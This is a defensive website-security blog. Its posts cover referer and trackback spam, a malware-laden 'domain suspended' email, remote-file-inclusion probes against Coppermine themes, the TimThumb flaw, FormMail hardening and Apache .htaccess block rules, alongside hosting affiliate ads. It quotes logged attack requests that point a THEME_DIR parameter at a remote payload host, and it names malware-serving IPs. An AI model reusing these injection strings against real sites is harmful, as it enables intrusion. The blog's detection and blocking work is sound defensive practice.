Wiz's Computer and Website Security Blog

Takeaway:

I write about a lot of different types of spam, but one of the oldest, next to email and USENET, is spamming the "REFERER" field on a website's raw access logs. I have been seeing this form of spam for over a decade now.

What is a raw access log?

Websites are usually setup or configured to generate a text or graphical log of all visits to those sites (a.k.a: "hits"). These logs contain information that is useful to Webmasters of the websites. Graphical access logs use pie or column charts to show where the hits are coming from, who sent them to you, what details they were searching for and other useful facts about each request. A "raw access log" presents these details in plain text format, in space-separated groups.

Why would anybody want to spam a website's raw access logs?

Over a decade ago, spammers learned that some website owners, or free hosting companies, or individuals hosting their own web servers at home (usually against T.O.S) were actually publishing their raw access logs so that the owners could read them in a web browser, from anywhere they might be. Most of these published access logs are not password protected, meaning anybody anywhere can view them, if they know the location of those website log files. Since so many people do not understand website security at all, they leave configurations in a default state. This means that if their raw access logs are published, the folder location will be predictable, based upon the operating system of the web server. That web server is usually the Apache Web Server.

Thus, when spammers began seeing website raw access logs that were in default folder locations, on various web servers, they could read them in their browsers, as could anybody else in the World who reads that language. So, some enterprising S.O.B. came up with the brilliant idea of posting a request for some files on some websites, and they decided to include fake "referrer" details.

What is the referrer field in an Access log?

The referrer field is a section of an access log that tells the owner/maintainer of the website where each visitor came from, just before they came to your website. In other words, who referred them to you. This information is extremely valuable for learning who links to your web pages, or is writing about you, or has found your site by means of a search engine result.

What do spammers do to referrer fields to turn them into spam?

Instead of revealing the actual referring page location of the website that the visitor (human or machine) was visiting when they decided to come yours, spammers use special web software programs to create whatever content they wish to present for the referer field. That special content usually takes to form of spammy links containing the names of illicit goods (illicit prescription drugs, counterfeit goods), or services (shady or illegal businesses).

Did I just misspell "referrer" as "referer?"

Nope. When the original Apache Web Server documentation was written, back in 1945, the scientists working on it accidentally misspelled the word Referrer as Referer. This misspelling has stayed with us to this very day!

Now, on to the rest of the details about Referer spam.

Continue reading "Access log "Referer" spam still happening through 2011" »

Posted by Wiz at 10:36 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

UPDATED on Nov 28, 2011, for Cyber Monday!

Are You Looking for Web Hosting With Quality Support? 24/7 Support Via Phone, Live Chat, and Email! Look no farther! HostGator is having its annual Black Friday Cyber Monday half price sale, beginning at 12:01 AM, November 28, and running until 11:59 PM, Nov 28, 2011, CST. All hosting types are included, from shared annual , to monthly, to dedicated servers.

The time zone conversions should revolve around Central Standard Time as the reference. So, if you are in the Eastern time zone, the sale begins at 1 AM Nov 28 and ends at 12:59 AM on Nov 29. You will know if you are within the sale time because the HostGator website has been updated for the 50% off deal.

Here are the details for the Black Friday Cyber Monday sale:

50% OFF on ALL hosting services. This includes shared hosting (as low as $2.48/month prepaid), reseller hosting, VPS hosting, Dedicated servers and Windows hosting! This does not include domain names.

Purchasers do NOT need to insert a coupon code to receive the special. The correct coupon code will automatically be inserted on all orders placed on Black Friday.

The discount applies to the clients first invoice. HostGator's VPS and dedicated server hosting services are only available on a monthly basis, therefore the promotion will apply to only the first month.

Read the details about HostGator's various webhosting accounts

If you are ready to open an account with HostGator, Use this link.

Posted by Wiz at 4:12 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Today I saw something new to me in the spam-containing-malware category. It was an email allegedly from one account on my own domain, sent to another existing account on my domain, notifying me that my domain had been suspended! FAIL!

Keep in mind as you read this, that I received this scam email from one of the email accounts on the supposedly suspended domain! I am posting about it on my blog, which is also hosted under the same domain name! A simple check for my home page shows that it is still up and running. Obviously, the email was a scam, attempting to panic me into opening the attached file. Not going to happen Boris!

Here, for both your amusement and to warn other domain/website owners about the scam, are the significant details from the normally hidden headers.

Received: from home-d805cd5a06 by smtp.wanadoo.fr; Thu, 22 Sep 2011 08:52:00 +0200
Date: Thu, 22 Sep 2011 08:52:00 +0200
Message-ID: <3774________________5200@wanadoo.fr>
Subject: Fw: IMPORTANT: wizcrafts.net has been suspended
From: REMOVED@wizcrafts.net
Reply-To: REMOVED@wizcrafts.net
To: REMOVED@wizcrafts.net
Content-Type: text/plain; charset=iso-8859-2

aEBb,
lGBf WLHZmMor Qu EpMu JDnky, kSr XuEPqWXQa?
a ue UBpyIYe opY QOdzUCjY.

jZKlDtiul,
tFJLfI wSMDlTD

------------F0C3F295E295E05
Content-Type: application/zip; name="Domain_Abuse_SBL141309_0920.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Domain_Abuse_SBL141309_0920.zip"

Continue reading "Domain suspended email notice contains malware attachment" »

Posted by Wiz at 5:42 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.

Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:

64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.

If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed.Next, log into your Coppermine admin panel and go over every setting to see what, if anything has been changed without your knowledge. Visit your gallery, using Firefox, with the NoScript add-on installed and active. View the Source code of your Gallery web pages and press Control + A to highlight all text and codes. Look for 1x1 px iframes with links to outside websites and other bad codes, like JavaScript or meta refresh redirects.

Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that they are not writable by the World; just the Owner (You). 644 is safest (Read-Write for Owner - Read-Read for Group and World) permission, for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.

If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.

If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.

According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.

Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that you web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!

Posted by Wiz at 12:38 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

If you a website owner, or Webmaster and you have installed WordPress blog software with image gallery themes on your websites, you may have a big problem, effective 8/1/2011. These programs are complicated software and as such, are subject to flaws caused by programming oversights. Exploitable scripting flaws have been discovered in a popular plug-in for themes: TimThumb. Those flaws are currently being used to inject malicious scripts and codes into millions of web pages. You need to see if your website is vulnerable to these exploits in the wild.

The details

This particular problem doesn't lie inside the WordPress software itself, but in a third party "plug-in" used by image themes that allow resizing of uploaded images. Those images may be uploaded by the owner of the blog, or by visitors from the Internet. Therein lies the danger.

First of all, you must be running the most current version of WordPress, which at this writing is v 3.2.1, preferably, with only themes approved and delivered through the WordPress website. This will protect the WordPress software itself, until a new vulnerability is discovered and published by hacker groups. Always get on the WordPress mailing list so you are notified when new versions are released. I recommend you bookmark and read this page often: http://wordpress.org/news/category/security/

You still need to check any theme directories (aka Folders) for the presence of the currently exploited file. If you are using an older version of WordPress, you had better upgrade first, at http://wordpress.org/.

The file currently being exploited by remote scanning scripts is named TimThumb.php. This file is used to resize images that are allowed to be uploaded to photo galleries. TimThumb is "inherently insecure" because it writes files into a temporary cache directory when it fetches an image and resizes it. But that directory, which is a sub-directory of your main WordPress directory, is accessible to people visiting the website. An attacker can compromise the site by figuring out how to get TimThumb to grab a malicious PHP file and put it in the WordPress directory. The code will be executed if an attacker then accesses the file using a Web browser.

Continue reading "Website using WordPress image resizing themes need to take action Now" »

Posted by Wiz at 11:24 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

On July 27, 2011, I published a blog article about blog spam scripts running on Ubiquity Servers. For several days those POST attempts from Ubiquity IP space disappeared. They returned today, leading me to a most interesting discovery about the source.

Let me show you how I find information about access log spam attempts and deal with them.

In today's first blog spam attempt, an unknown visitor, with the IP address 108.62.150.52, attempted to POST a trackback comment to my Movable Type blog. If the POST was made by a real person, and if that person understood and read the English language, he or she would have read the bold notice that my blog does not accept either comments or trackbacks.

Of course, if the POST was made by a script, it would neither see that notice, nor care about it. Similarly, if the POST was being attempted by somebody in a very foreign country, in say Romania, they would not understand the text in notices I post on every page, regarding no trackbacks allowed. And from where did this POST originate? Romania!

Here then, without any ado, is the chain of evidence linking a blog spam attempt to Romania, from whence a huge amount of spam and online exploits have been traced.

Continue reading "Evidence linking Romanian spammers to Ubiquity Servers" »

Posted by Wiz at 3:21 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

In 2009 I wrote about trackback spammers using scripts they have installed on servers owned by Ubiquity Server Solutions and Nobis Technology Group before. After 1.5 years they still haven't cleaned up this abuse. It seems that every day or two I see numerous POST attempts to my blog, which are either comment or trackback spam.

I'd like to let the people installing these scripts targeting my blog know, that in my case, their efforts are futile. That is because I run a Perl based Movable Type blog and these spam scripts assume that the target is running on a more common, but less secure, PHP driven blog, usually Wordpress.

It appears that if one uses WordPress as their blog software, a simple POST command is sufficient to post comments or trackbacks to that blog page. Not so with Movable Type! With MT, one must visit a particular scripted page to submit a comment or a trackback. Not only must they have valid credentials to submit, but anything submitted is held until the owner of the blog approves that submission. It goes without saying that nobody in his or her right mind is going to approve spam comments or trackbacks!

I take matters one step farther: I do not accept either comments or trackbacks on any of my blog articles. It says so right at the top of every page on this blog. Yes, I have the scripts installed to do comments and trackbacks, but, they are disabled in the Dashboard. I can't even comment om my own posts. If the time ever comes where I feel like allowing public comments, it will only be from people holding approved credentials and then, all comments would be held for moderation. Nothing would ever get posted that was in any way spammy!

This brings me back to the title of this article. A majority of the failed attempted spam comments and trackbacks are emanating from IP space under the control of Ubiquity Server Solutions. In the last few days I have logged several attempts coming from various IP addresses covered by the following CIDR ranges: 173.234.124.0/22, 173.234.172.0/22 and 173.234.184.0/22. All of these CIDRs are part of the entire Class C network assigned to Ubiquity and Nobis: 173.234.0.0/16.

Note: This CIDR is not the only one assigned to Ubiquity Servers. They hold several other ranges.

So, they're spamming your blogs ... Let's block them from your Apache hosted websites...

Continue reading "Blog spam scripts still running on Ubiquity Servers" »

Posted by Wiz at 4:29 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

You'd think that with the seemingly unstoppable flow of all types of spam, that it must pay fairly decently. It does, for the upper echelon of professional spammers and their top affiliates. But, not necessarily for the lower ranks or those engaging in spam on their own.

Still, paying (for spammers) or not, the spam flood continues. It seems like an impossible task for us little guys to do anything to stop it. But is it really impossible for individual spam recipients to fight back and stop it? Not in this case!

So begins my story, where this little guy was able to make a big difference against a determined spammer. The spam I'm writing about is not your usual type, although it may have also been delivered to others through more typical means. This type of spam is where domain owners, or hired agents post spam links to the websites they are "spamvertising" - in the access logs of innocent websites. This is known as "log spam." They do this in the hopes that these logs may be published for the World to see, and show up in search results for the spamvertised keywords.

Since I have owned domains I have read my access logs, both to see where traffic comes from, and to catch bad behavior before it gets out of control. During the early to mid 2000's, from about 2002 through 2006, it was very common to see spam comments and links posted to a website's access logs, from remote visitors. These visitors were not usually human, but were often automated scripts written to post spam links in the "REFERER" field (that is how it is misspelled in the Apache Server documentation) of typical web logs. The reason they did this was because many cheaply or freely hosted websites published those access logs as viewable by the public, by default.

Fast forward to 2011 and despite the fact that most websites, like mine, have only privately accessible logs, the people wanting to spamvertise their new, often unfriendly websites will employ every tactic available to them. Thus, the spammer who wanted to promote his two new websites decided to post REFERER spam to my access logs. At first this was just an oddity that caught my eye, as it perused the hundreds of lines of hits to my main site. However, I am not your typical Webmaster and I don't have a typical viewpoint for seeing things, with my trained eyes.

Over a period of two weeks I noticed a repeating pattern of obvious spam links for two domains, coming at a short, predictable interval, from two closely related IP addresses. The IP addresses led to a broadband ISP in Czechoslovakia. The websites they were promoting were hosted by a well known hosting company here, in the USA.

Read my extended comments for the rest of the story.

Continue reading "Sometimes spamming does not pay!" »

Posted by Wiz at 4:01 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

After months of preparation and one trip to Toledo, to take photographs, I have finally managed to get the initial version of the Toledo Industrial Sewing Machines website online. It has been quite a task, trying to catch the owner, Bob Kovar, in between him answering phone calls and setting up and repairing industrial sewing machines.

The business is located at 3631 Marine Road, near the airport, in Toledo, Ohio. The building is huge and is thoroughly polluted with industrial sewing machines. They are everywhere; on racks, tables, counters, and on the floor. If it's a sewing machine and built for professional use, they probably have it in stock! I'm talking bar tackers, sergers, walking foot machines, needle feed machines, zig-zaggers, button machines, tailors' machines, shoe patchers, cylinder arm machines, post machines, portable walking foot machines, and ... the entire line of Cowboy sewing equipment. They also have a huge stock replacement parts, needles, bobbins, etc, and nylon thread, in sizes from #46 up to #346.

The website was primarily designed around the Cowboy brand machines, which are highly favored by professional and semi-pro leather crafters. These big leather stitchers are able to sew through 7/8 inch of veg-tan or bridle leather and are used to make holsters, halters, saddles, bridles, reins, dress, gun and weight belts, and all manner of cases, pouches, sheathes and leather bags.

I still have a lot more work to do on the website, but I invite you to go to www.tolindsewmach.com and take a look around. If you know somebody who needs an industrial sewing machine, or a big leather stitcher, tell them about Toledo Industrial Sewing Machines!

If you are looking for a Webmaster, please contact me! I have reasonable hourly rates.

Posted by Wiz at 11:33 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

On Thursday night I wrote a blog article about the then upcoming Black Friday super sale at HostGator web hosting. That sale has come and gone, but, due to popular demand, HostGator is going to run their 50% off all hosting packages and lengths of contract, on Cyber Monday, November 29, 2010. Here are the basic details you need to know.

1: This is a straight 50% off sale, based solely on your first invoice as a new customer.

2: All HostGator hosting packages are included. This means whether you want the cheapest shared hosting or your own dedicated server, you will be invoiced 1/2 of list price.

3: Since the discount only comes off your first invoice, it is wise to buy into as long a term as you can afford. Renewals will be at the going rate, when they come due.

4: This deal does not apply to existing customers with current accounts on HostGator.

5: All you have to do to sign up for any hosting services online at the HostGator website and the 50% off coupon will be AUTOMATICALLY applied.

This is what a typical deal will cost you, based on the four most popular types and lengths of hosting (longer and shorter terms are available):

Shared Hosting: ONLY $2.48/month
Reseller Hosting: ONLY $12.48/month
VPS Hosting: ONLY $9.98 First Month
Dedicated Servers: ONLY $87 First Month

Note: You can get a free domain with your purchase of a hosting package, should you need one. Otherwise, you can transfer your existing domains for free. Here are just a few of the features included in the shared hosting accounts.

* Unlimited Disk Space
* Unlimited Bandwidth
* Free SiteBuilder (Try Demo)
* Easy Control Panel (Try Demo)
* 1-Click Script Installs
* 4,500 Free Website Templates
* 99.9% Uptime Guarantee
* 45 Day Money Back Guarantee
* 24/7/365 Technical Support
* $100 Google AdWords Credit

Get HostGator Web Hosting Now! This promotion will only run Monday November 29th, from 12:00AM to 11:59PM CST (-6 GMT).

If you miss out on this discount, HostGator still has shared hosting plans for as little as $4.95 per month.

Posted by Wiz at 1:09 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

If you own domain names and have hosting that is too expensive (especially come renewal time), or want to create your first website, but don't want to be locked into high monthly or annual prices, HostGator has the deal of a lifetime. For one day only, Friday, November 26, 2010, beginning at 12:00 AM Central Standard Time, HostGator is offering the following humongous discounts on all of their web hosting packages (regular $4.95/month for shared hosting, up to $174/month for a dedicated server).

• 50% OFF EVERYTHING From 12:00AM CST to 5AM CST
• 80% OFF EVERYTHING From 5AM to 9AM CST (While Spaces last)
• From 9AM to 11:59PM CST, or after all 80% off accounts have sold out, they will continue to offer 50% OFF ALL HOSTING PACKAGES

This applies to ALL Accounts and ALL Term Lengths. If you are one of the lucky people to get in on the 80% off discount, you will have the opportunity to receive up to 80% off of up to 3 years worth of Hosting! That would come out to $35.64 for 3 FULL YEARS!

The Black Friday discounts include Shared Hosting, Reseller Hosting, VPS Hosting AND even Dedicated Servers! Never before has HostGator allowed such a promotion on EVERYTHING including reseller, VPS and dedicated servers AND ALL Term Lengths.

Note; The discount will apply to your first invoice (first term length you sign up for whether that be 1 month or for 3 years). You may as well sign up for three full years at these prices.

Get HostGator Web Hosting Now! Comes with 24/7 Support via Phone, Live Chat, and Email and a 30 day money back guarantee. Lease terms range from 1 month, up to 3 years.

Remember; all of these discounts end at 11:59 PM, CST! Don't let this one slip past you. Act Now!

Posted by Wiz at 8:56 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

For the past few days I have discovered that a script, or person operating a server farm, at Ubiquity Server Solutions, is attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet, this spamming idiot keeps blasting away with his script, ignoring a constant flow of Server 403 (Forbidden) responses. The page that the spammer is trying to POST to is no longer on the blog database, having been deleted in the spring of 2006! So, he is wasting his time and amusing me as I look at all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! You will notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May of 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers"not understanding a 403 Forbidden response, when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of Server 403 Forbidden responses by blocking his IP CIDR and his user agent in your public web root .htaccess file, as demonstrated below.

Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »

Posted by Wiz at 2:16 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any givien week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending codes to it that are designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve trying to upload or inject a hostile file to a PHP script that is known to be exploitable. These are known a PHP Injection Exploits. Of those targeted scripts, the one that I see almost every day, in my access logs, is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, or hacker, or bot tries to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry:

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless InterDomain Routing." It is designated by appending a forward slash and number to the end of a starting IP address, to designate an entire range of IPs assigned to that entity. In this case, 70.84.0.0/14 covers all IPs between 70.84.0.0 trough 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent "Mozilla/5.0" - which is a known hacking tool. Read on and learn to how protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or Mozilla/5.0 hack tools.

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »

Posted by Wiz at 2:33 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I was running a vulnerable version of the targeted "Coppermine" software, that upload attempt would have yielded a server 200 Success, instead of a 403 Forbidden response. This would have led to the exploitation of my website and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Continue reading "Protect your Apache hosted webite from Chinese exploit attacks" »

Posted by Wiz at 12:11 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Takeaway

This week has been a headache for the major web software vendors, especially Red Hat Linux and other distributions. Windows users are being targeted by highly critical vulnerabilities in Winamp and Quicktime. Mac users are affected by a flaw in Calendar Objects for Java. So far, between May 18 and 22 there have been at least 85 vulnerability advisories reported by the security investigators at Secunia, 17 of which are rated as "highly critical." I counted at least 7 SQL flaws that can be or are being exploited to inject hostile redirection codes into websites.

Windows Vulnerabilities

On 5/18 /09, Secunia reported an unpatched flaw in Winamp 5.x that can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to the use of vulnerable libsndfile code. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. The vulnerability is confirmed in version 5.552, but other versions may also be affected. Since this vulnerability in currently unpatched, the best advise is to not open untrusted files in Winamp.

A highly critical vulnerability was reported in Apple QuickTime 7.x, on 5/22/09, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site. This flaw is new and unpatched, so you are advised to not browse untrusted web sites, or open PICT files from untrusted sources.

Read about the vulnerabilities affecting other operating systems and software in my extended comments.

Continue reading "Vulnerabilities roundup for May 18 - 22, 2009" »

Posted by Wiz at 5:24 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknown to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop in secure replacement script known as NMS FormMail, which was developed by a group of calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email account(s) from being harvested by creating alias numbers for them, in NMS FormMail, instead of using plain text addresses to submit to. But, there's more you can do that wasn't covered in my original article.

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder to locate the script for hostile bots it is useless at protecting it against human spammers. All they need to do is to read the source code of your contact, or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special codes, called Mod_Rewrite Directives, that can be applied to a particular server file named .htaccess to completely hide the name of the renamed script, protecting it from being used as a spam relay. If you are allowed to add these directives you can make your FormMail script invisible to spammers.

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »

Posted by Wiz at 2:15 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

